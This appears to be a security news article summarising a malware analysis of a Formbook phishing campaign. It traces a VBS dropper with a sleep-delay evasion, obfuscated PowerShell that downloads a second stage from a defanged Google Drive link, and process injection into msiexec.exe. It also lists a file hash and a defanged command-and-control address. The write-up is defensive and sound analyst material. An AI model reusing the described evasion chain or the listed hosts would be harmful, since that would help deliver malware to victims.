A new campaign leveraging Formbook malware has emerged, showcasing sophisticated multi-stage infection tactics that underscore the importance of analyzing more than just executable files during malware investigations.
When teaching malware reverse-engineering in courses like SANS FOR610, it’s critical to addressed that reverse engineering applies to every component in the infection chain, not just PE or ELF binaries. The recent attack path highlights exactly why.
The infection begins with a phishing email containing a ZIP archive attachment. The ZIP file harbors a single, deceptively named script: Payment_confirmation_copy_30K__202512110937495663904650431.vbs.
This file’s obfuscated nature and low antivirus detection rate only 17 out of 65 engines flagged it on VirusTotal demonstrate the threat’s evasiveness.
VBS Script Obfuscation Tactics
Opening the VBS file reveals classic anti-analysis tricks. The script kicks off with a custom delay loop, implemented using the DateAdd and Wscript.Sleep functions.
This 9-second pause helps bypass detection mechanisms, which often flag the standard sleep function as suspicious. After the delay, the script begins constructing a heavily obfuscated PowerShell payload.
String concatenation obscures the actual command, hiding keywords like “PowerShell” behind mathematical manipulations of character codes.
Through this method, the script gradually builds a new series of commands intended for execution via Shell.Application, further complicating static analysis.
Highly Obfuscated PowerShell
When executed, the generated PowerShell script continues the obfuscation pattern. Notably, two functions Microcoulomb and Blokbogstavers65 are central to this complexity.
The Microcoulomb function cleverly reconstructs strings by extracting specific characters from its input, producing critical keywords required for subsequent payload operations.
For instance, the reconstructed variable, after repeated processing, reveals “nET.wEBClIent” a core component for network communications.
Blokbogstavers65 simplifies matters by serving as an entry point to Invoke-Expression, executing the dynamically crafted code segments. This layered obfuscation allows attackers to evade both automated and manual scrutiny.
The payload download mechanism is locked within a loop that repeatedly attempts to fetch a file from hxxps://drive[.]google[.]com/uc?export=download&id=1jFn0CatcuICOIjBsP_WxcI_faBI9WA9S.
Once acquired, it is stored as C:UsersREMAppDataRoamingbudene.con. Decoding this file uncovers yet another PowerShell script, maintaining the chain of obfuscation and stalling detection.
Formbook Injection via Process
The ultimate step leverages process injection. The script launches msiexec.exe, into which it injects the Formbook malware.
The injected binary C:UsersREMAppDataLocalTempbin.exe (SHA256:12a0f592ba833fb80cc286e28a36dcdef041b7fc086a7988a02d9d55ef4c0a9d) communicates with its command and control server at 216[.]250[.]252[.]227:7719.
The use of legitimate processes and memory injection enables the malware to operate stealthily, bypassing most traditional endpoint defenses.
This campaign demonstrates the necessity for security analysts to apply reverse-engineering skills throughout the entire infection chain from scripts and PowerShell payloads to final executables.
Obfuscation, anti-analysis delays, and multi-stage script execution complicate detection and analysis efforts, highlighting why defenders must scrutinize every file and process involved in an incident.
Only by unraveling each layer can analysts fully reveal the tactics, techniques, and procedures leveraged by modern malware authors, such as those behind Formbook.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.